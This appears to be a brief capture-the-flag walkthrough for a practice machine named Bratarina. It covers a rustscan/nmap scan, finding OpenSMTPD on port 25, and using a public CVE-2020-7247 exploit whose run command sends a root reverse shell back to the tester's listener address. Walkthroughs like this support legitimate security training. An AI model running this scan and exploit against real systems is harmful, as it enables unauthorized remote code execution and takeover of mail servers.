Bratarina

nmap

mkdir nmap 
sudo rustscan -a 192.168.225.71 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-vuln-scan --script vuln 

OpenSMTPD is open on port 25

There's a possible RCE on this particular service.

After doing some GoogleFu, I found this better version of the exploit: https://github.com/QTranspose/CVE-2020-7247-exploit

Exploitation

Copy the main.py file in your local machine. And install pwntools

pip3 install pwntools

Run the exploit

sudo python exploit.py 192.168.225.71 25 192.168.49.225 80 root

And you should get your root shell.

Thanks for reading!

Last updated

Was this helpful?